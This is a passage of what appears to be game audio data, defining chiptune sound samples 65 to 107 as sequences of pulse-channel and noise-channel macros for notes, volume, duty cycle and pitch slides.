AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,0,15) SAMPLE_END .) music_adventure_sample_65: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(31,1,0,15) SAMPLE_END .) music_adventure_sample_66: .( CHAN_VOLUME_HIGH(7) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,44) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) SAMPLE_END .) music_adventure_sample_67: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,0,15,0) SAMPLE_END .) music_adventure_sample_68: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,0,15) SAMPLE_END .) music_adventure_sample_69: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(37,1,0,15,0) SAMPLE_END .) music_adventure_sample_70: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(36,1,15,7) AUDIO_PULSE_META_NOTE_DUT_VOL(24,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,36) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_NOTE_DSLIDE(36,3,0) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,0,15) SAMPLE_END .) music_adventure_sample_71: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(32,1,0,15,0) SAMPLE_END .) music_adventure_sample_72: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(39,1,0,15,0) SAMPLE_END .) music_adventure_sample_73: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,0,15) SAMPLE_END .) music_adventure_sample_74: .( AUDIO_PULSE_META_NOTE_USLIDE(44,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(43,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) SAMPLE_END .) music_adventure_sample_75: .( AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_76: .( AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(38,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_77: .( AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(6) SAMPLE_END .) music_adventure_sample_78: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_79: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_80: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(7) SAMPLE_END .) music_adventure_sample_81: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_82: .( CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(20,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(24,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) SAMPLE_END .) music_adventure_sample_83: .( AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) SAMPLE_END .) music_adventure_sample_84: .( AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(25,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(29,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) SAMPLE_END .) music_adventure_sample_85: .( AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) SAMPLE_END .) music_adventure_sample_86: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) SAMPLE_END .) music_adventure_sample_87: .( AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(27,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(31,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) SAMPLE_END .) music_adventure_sample_88: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) SAMPLE_END .) music_adventure_sample_89: .( AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) SAMPLE_END .) music_adventure_sample_90: .( AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(25,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(29,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) SAMPLE_END .) music_adventure_sample_91: .( AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) SAMPLE_END .) music_adventure_sample_92: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(23,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(27,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(3) AUDIO_PULSE_META_NOTE_VOL_USLIDE(30,1,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(34,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(3) SAMPLE_END .) music_adventure_sample_93: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,48) PLAY_TIMED_NOTE(4,44) AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,48) PLAY_TIMED_NOTE(4,44) SAMPLE_END .) music_adventure_sample_94: .( SAMPLE_END .) music_adventure_sample_95: .( AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(9) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(9) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_96: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(10,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_97: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(10,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_98: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_99: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(44,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) SAMPLE_END .) music_adventure_sample_100: .( AUDIO_PULSE_META_WAIT_VOL(17,11) AUDIO_PULSE_META_WAIT_USLIDE(8,-3) AUDIO_PULSE_META_NOTE_DSLIDE(48,2,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_101: .( AUDIO_PULSE_META_WAIT_VOL(22,11) AUDIO_PULSE_META_WAIT_DSLIDE(4,9) AUDIO_PULSE_META_NOTE_DSLIDE(43,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_102: .( AUDIO_PULSE_META_WAIT_VOL(17,11) AUDIO_PULSE_META_WAIT_USLIDE(8,-7) AUDIO_PULSE_META_NOTE_DSLIDE(51,2,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_103: .( CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_104: .( PLAY_TIMED_NOTE(9,39) PLAY_TIMED_NOTE(9,41) PLAY_TIMED_NOTE(9,39) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_FREQ(333,30) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_NOTE(9,44) PLAY_TIMED_NOTE(9,43) PLAY_TIMED_NOTE(9,41) PLAY_TIMED_NOTE(9,39) SAMPLE_END .) music_adventure_sample_105: .( PLAY_NOTE(1,3,41) SAMPLE_END .) music_adventure_sample_106: .( PLAY_TIMED_FREQ(297,39) SAMPLE_END .) music_adventure_sample_107: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) 